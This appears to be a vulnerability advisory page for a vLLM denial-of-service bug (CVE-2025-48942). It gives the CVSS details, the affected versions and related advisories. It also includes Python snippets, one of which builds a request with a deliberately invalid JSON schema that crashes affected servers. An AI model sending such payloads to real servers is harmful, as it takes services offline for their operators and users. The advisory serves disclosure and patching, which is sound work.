CVE-2025-48942: Uncaught Exception in vLLM

CWE-248: Uncaught Exception (8 documents, 4 sources)
Severity: 6.5 MEDIUM (NVD)
EPSS: 0.2% (top 56.55%)
CISA KEV: Not in KEV
Exploit: No known exploits
Timeline: Published May 30

Description

vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with an invalid json_schema as a guided param kills the vLLM server. This vulnerability is similar to GHSA-9hcf-v7m4-6m2j / CVE-2025-48943, which involves an invalid regex rather than a JSON schema. Version 0.9.0 fixes the issue.
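As a hedged illustration of the crash vector described above, the following sketch builds an OpenAI-style /v1/completions request whose guided-decoding schema is deliberately invalid. The parameter name (`guided_json`), model name, and server URL are assumptions based on vLLM's OpenAI-compatible API, not details taken from this advisory.

```python
import json

# Hypothetical reproduction sketch (names assumed, not from this advisory):
# a /v1/completions payload carrying an invalid JSON Schema as a guided
# decoding parameter. Against vLLM 0.8.x this reportedly killed the server.
payload = {
    "model": "some-model",   # placeholder model name
    "prompt": "Hello",
    # "type": "objec" is a deliberately malformed JSON Schema keyword value.
    "guided_json": {"type": "objec", "properties": {"x": {"type": "string"}}},
}

body = json.dumps(payload)

# Sending it requires a running server, so the request itself is left
# commented out on purpose:
# import urllib.request
# req = urllib.request.Request(
#     "http://localhost:8000/v1/completions",  # assumed default vLLM port
#     data=body.encode(), headers={"Content-Type": "application/json"})
# urllib.request.urlopen(req)
```

Because the server dies on the unhandled exception rather than returning a 4xx error, a single unauthenticated-but-valid API call is enough for denial of service, which matches the A:H / C:N / I:N vector below.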

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Exploitability: 2.8 | Impact: 3.6
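As a worked check, the 6.5 base score and the exploitability/impact subscores above can be recomputed from the vector using the CVSS v3.1 base-score equations and metric weights (scope unchanged); the formulas are from the specification, not from this advisory.

```python
# CVSS v3.1 metric weights for AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
AV, AC, PR, UI = 0.85, 0.77, 0.62, 0.85   # Network / Low / Low (S:U) / None
C, I, A = 0.0, 0.0, 0.56                  # None / None / High

def roundup(x: float) -> float:
    # CVSS v3.1 Roundup: smallest one-decimal value >= x (spec Appendix A).
    i = round(x * 100000)
    return i / 100000.0 if i % 10000 == 0 else (i // 10000 + 1) / 10.0

exploitability = 8.22 * AV * AC * PR * UI        # ~2.8
isc_base = 1 - (1 - C) * (1 - I) * (1 - A)       # 0.56
impact = 6.42 * isc_base                          # ~3.6 (scope unchanged)
base = 0.0 if impact <= 0 else roundup(min(impact + exploitability, 10))
print(base)  # 6.5, matching the NVD score above
```

Note that only availability is impacted (C:N/I:N/A:H): the attack crashes the server but discloses and modifies nothing, which is why the score stays in the MEDIUM band despite being remotely triggerable.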

Affected Packages (3 packages)

NVD: vllm/vllm — affected from 0.8.0, fixed in 0.9.0
PyPI: vllm/vllm — affected from 0.8.0, fixed in 0.9.0 (+1)
CVEListV5: vllm-project/vllm — >= 0.8.0, < 0.9.0
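A minimal sketch of checking an installed version against the affected range >= 0.8.0, < 0.9.0 listed above (helper names are illustrative; it only handles plain X.Y.Z versions, not pre-release tags):

```python
def parse(v: str) -> tuple:
    # Split "X.Y.Z" into an integer tuple so comparisons are numeric,
    # not lexicographic ("0.10.0" > "0.9.0" would fail as strings).
    return tuple(int(part) for part in v.split("."))

def is_affected(version: str) -> bool:
    # Affected range from the advisory: >= 0.8.0 and < 0.9.0.
    return parse("0.8.0") <= parse(version) < parse("0.9.0")

print(is_affected("0.8.5"))   # True  -- inside the affected range
print(is_affected("0.9.0"))   # False -- 0.9.0 ships the fix
```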

Patches

🔴 Vulnerability Details (4)
OSV — CVE-2025-48943: vLLM is an inference and serving engine for large language models (LLMs) (2025-05-30)
OSV — CVE-2025-48942: vLLM is an inference and serving engine for large language models (LLMs) (2025-05-30)
OSV — vLLM DOS: Remotely kill vllm over http with invalid JSON schema (2025-05-28)
GHSA — vLLM DOS: Remotely kill vllm over http with invalid JSON schema (2025-05-28)

📋 Vendor Advisories (2)
Red Hat — vllm: Remote crash of vllm server with invalid regex (2025-05-30)
Red Hat — vllm: vLLM denial of service via invalid JSON schema (2025-05-30)